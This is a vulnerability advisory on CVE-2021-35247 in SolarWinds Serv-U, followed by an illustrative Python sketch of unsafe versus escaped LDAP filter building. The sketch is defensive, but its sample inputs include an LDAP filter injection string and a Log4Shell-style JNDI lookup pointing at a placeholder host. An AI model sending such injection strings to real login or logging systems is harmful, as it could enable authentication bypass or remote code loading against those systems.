Issued: Monday, 24 January, 2022 |
Last Revision: Monday, 24 January, 2022 |
Vendor: |
Product: |
Severity Level: |
Microsoft has found a new vulnerability in SolarWinds Serv-U, related to attacks being propagated via a previously undisclosed vulnerability in the software. The vulnerability, tracked as CVE-2021-35247, is an input validation vulnerability that could allow attackers to build a query based on given input and send it over the network without sanitization.
In Serv-U, users can be authenticated against an internal LDAP server, such as a Windows domain controller or OpenLDAP server.
According to SolarWinds, the attempts to log in to Serv-U using the Log4j vulnerability failed, as Serv-U does not utilize Log4j code and the target for LDAP authentication (Microsoft Active Directory) is not susceptible to Log4j attacks.
CVE/Vulnerability | Description | CVSS3.0 Score |
CVE-2021-35247 | Input Validation Vulnerability | 5.3 |
Table 1: Vulnerability details
CVE/Vulnerability | Affected Product(s) |
CVE-2021-35247 | SolarWinds Serv-U 15.2.5 and previous versions |
Table 2: Vulnerable versions
We encourage organizations to update the affected software to its latest version as soon as possible.
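The class of issue described above, a login name placed into an LDAP query without sanitization, is shown here as an added example; it is not Serv-U code and not part of the original advisory. The filter template, the attribute names, the allow-list pattern and the sample usernames are assumptions made for illustration.

```python
import re

# RFC 4515: characters that must be written as \XX inside a filter value.
_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}

# Assumed allow-list for login names; adjust to the directory's naming rules.
_USERNAME_RE = re.compile(r"[A-Za-z0-9._@-]{1,64}")

# Assumed filter template (Active Directory style attribute names).
_TEMPLATE = "(&(objectClass=user)(sAMAccountName={}))"


def escape_filter_value(value):
    """Escape a string for use as an assertion value in an LDAP filter."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def is_valid_username(name):
    """True only if the whole name matches the allow-list."""
    return _USERNAME_RE.fullmatch(name) is not None


def build_filter_unsafe(username):
    """The 'before': input goes into the query unchanged."""
    return _TEMPLATE.format(username)


def build_filter_safe(username):
    """The 'after': reject unexpected characters, then escape anyway."""
    if not is_valid_username(username):
        raise ValueError("username rejected by allow-list")
    return _TEMPLATE.format(escape_filter_value(username))


def count_groups(ldap_filter):
    """Count '(' characters; escaped ones appear as \\28 and are not counted."""
    return ldap_filter.count("(")


if __name__ == "__main__":
    # Constructed sample inputs, not taken from any real log.
    for name in ["alice", "x)(cn=*", "${jndi:ldap://example.invalid/a}"]:
        print(repr(name), "valid" if is_valid_username(name) else "rejected")
        print("  unsafe :", build_filter_unsafe(name))
        print("  escaped:", _TEMPLATE.format(escape_filter_value(name)))
```

The unescaped filter gains an extra component when the name contains parentheses, while the escaped form keeps the three components of the template.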
